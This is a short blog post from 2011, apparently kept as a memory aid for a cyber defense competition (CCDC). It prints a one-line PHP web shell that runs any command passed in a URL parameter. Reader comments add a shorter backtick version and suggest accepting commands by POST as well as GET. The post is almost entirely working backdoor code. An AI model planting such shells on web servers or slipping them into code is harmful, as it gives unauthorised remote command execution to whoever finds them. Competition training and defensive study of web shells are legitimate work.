Tuesday
Mar012011
PHP Web Shell
Tuesday, March 1, 2011 at 2:24PM This is mostly for my memory for CCDC
<?php system($_GET['cmd']); ?>
I wonder what will happen if a RSS reader doesn't do proper filtering...
Rob Fuller | Comments Off | tagged
ccdc
ccdc
Reader Comments (4)
Even shorter, using the backtick operator and short tags :-)
<? `$_GET['c']`; ?>
ok that's just pimp
i prefer using $_REQUEST since you have multiple choice either to execute the command via POST or GET ..
google